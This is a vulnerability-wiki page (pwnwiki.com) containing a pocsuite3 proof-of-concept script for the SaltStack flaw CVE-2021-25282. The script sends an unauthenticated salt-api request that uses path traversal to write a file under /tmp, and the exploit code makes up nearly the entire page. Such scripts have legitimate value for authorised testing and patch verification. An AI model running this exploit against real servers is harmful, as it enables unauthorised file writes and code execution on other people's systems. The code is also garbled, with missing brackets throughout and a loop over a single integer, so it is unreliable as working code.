pwnwiki.com
,
|
POC
#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
import re
import json
class TestPOC(POCBase):
vulID = '000'
version = '1'
author = 'zhzyker'
vulDate = '2021-02-27'
createDate = '2021-03-02'
updateDate = '2021-03-02'
references = 'https://github.com/zhzyker/vulmap'
name = 'SaltStack Arbitrary file writing vulnerability(CVE-2021-25282)'
appName = 'SaltStack'
appVersion = '< 3002.5'
vulType = VUL_TYPE.CODE_EXECUTION
category = POC_CATEGORY.EXPLOITS.REMOTE
desc = '''
Unauthorized access to wheel_async, arbitrary code/commands can be executed through salt-api.
'''
def _verify(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = pr.port
else:
ports = 8000
for port in ports:
target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
TIMEOUT = 10
url = target + "/run"
path = "../../../../../../../../../tmp/vuln"
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'Content-Type': 'application/json'
}
data = {
'eauth': 'auto',
'client': 'wheel_async',
'fun': 'pillar_roots.write',
'data': 'vuln_cve_2021_25282',
'path': path
}
data = json.dumps(data)
try:
r = req.post(url, headers=headers, data=data, timeout=TIMEOUT, verify=False)
# print(r.text)
tag = list(json.loads(r.text)"return")0"tag"
jid = list(json.loads(r.text)"return")0"jid"
if r"salt/wheel" in tag:
if jid in tag:
result'VerifyInfo' = {}
result'VerifyInfo''URL' = url
result'VerifyInfo''JID' = jid
result'VerifyInfo''UPLOAD' = path
break
except:
pass
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
register_poc(TestPOC)
版权信息
POC由【之乎者也】提供。
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
